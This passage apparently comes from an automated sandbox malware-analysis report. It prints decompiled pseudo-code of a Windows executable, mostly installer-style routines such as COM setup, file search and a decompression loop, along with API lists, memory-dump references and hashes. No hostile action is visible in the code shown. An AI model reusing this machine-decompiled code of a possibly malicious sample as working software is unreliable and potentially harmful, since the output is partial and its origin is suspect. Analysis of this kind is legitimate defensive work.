							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                          0x00402174
                                                          0x0040217e
                                                          0x00402188
                                                          0x00402195
                                                          0x004021a0
                                                          0x004021a3
                                                          0x004021bd
                                                          0x004021c3
                                                          0x004021c9
                                                          0x004021cc
                                                          0x004021d6
                                                          0x004021da
                                                          0x004021da
                                                          0x004021df
                                                          0x004021f0
                                                          0x004021f8
                                                          0x004022d4
                                                          0x004022d4
                                                          0x004022db
                                                          0x004021fe
                                                          0x004021fe
                                                          0x0040220d
                                                          0x00402211
                                                          0x00402214
                                                          0x0040221a
                                                          0x00402228
                                                          0x0040222b
                                                          0x0040222d
                                                          0x00402238
                                                          0x00402238
                                                          0x0040223d
                                                          0x0040223f
                                                          0x00402246
                                                          0x00402246
                                                          0x00402249
                                                          0x00402252
                                                          0x00402255
                                                          0x0040225a
                                                          0x0040225c
                                                          0x00402269
                                                          0x00402269
                                                          0x0040226c
                                                          0x00402278
                                                          0x0040227b
                                                          0x00402284
                                                          0x0040228a
                                                          0x00402291
                                                          0x004022aa
                                                          0x004022ac
                                                          0x004022ba
                                                          0x004022ba
                                                          0x004022aa
                                                          0x004022bd
                                                          0x004022c3
                                                          0x004022c3
                                                          0x004022c6
                                                          0x004022cc
                                                          0x004022d2
                                                          0x004022e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004022d2
                                                          0x004022dd
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 123533781-501415292
                                                          • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                          • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 39%
                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                          0x004027b9
                                                          0x004027cd
                                                          0x004027d8
                                                          0x004027d9
                                                          0x00402918
                                                          0x004027bb
                                                          0x004027bb
                                                          0x004027bd
                                                          0x004027bf
                                                          0x004027bf
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                          • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                          • Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                          • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406945, Relevance: .3, Instructions: 334COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
